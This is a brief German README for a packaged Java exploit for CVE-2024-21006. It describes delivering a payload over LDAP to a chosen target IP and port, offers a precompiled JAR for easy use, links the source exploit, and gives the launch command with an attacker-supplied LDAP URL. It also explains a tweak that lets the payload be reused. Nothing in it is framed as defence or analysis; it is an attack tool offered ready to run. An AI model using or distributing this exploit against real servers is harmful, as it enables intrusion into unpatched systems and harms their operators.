
Java-basierter Exploit für CVE-2024-21006, der eine Payload über LDAP an eine Ziel-IP und einen Zielport liefert. Enthält kompilierte JAR und Quellcode zur Anpassung.
exp-Code-Referenz: https://github.com/momika233/CVE-2024-21006
Hier wurde der Quellcode in ein JAR-Paket kompiliert, um die Nutzung zu erleichtern. Unter lib liegen die Abhängigkeitsdateien. Falls du den Quellcode ändern möchtest, kannst du ihn selbst kompilieren.
java -jar CVE-2024-21006.jar <ip> <port> <ldapUrl>


In Anlehnung an das Projekt von dadvlingd wird ein zufälliger String gebunden, um das Problem zu lösen, dass der Payload nur einmal verwendet werden kann.
https://blog.csdn.net/zwy15288408160/article/details/138189146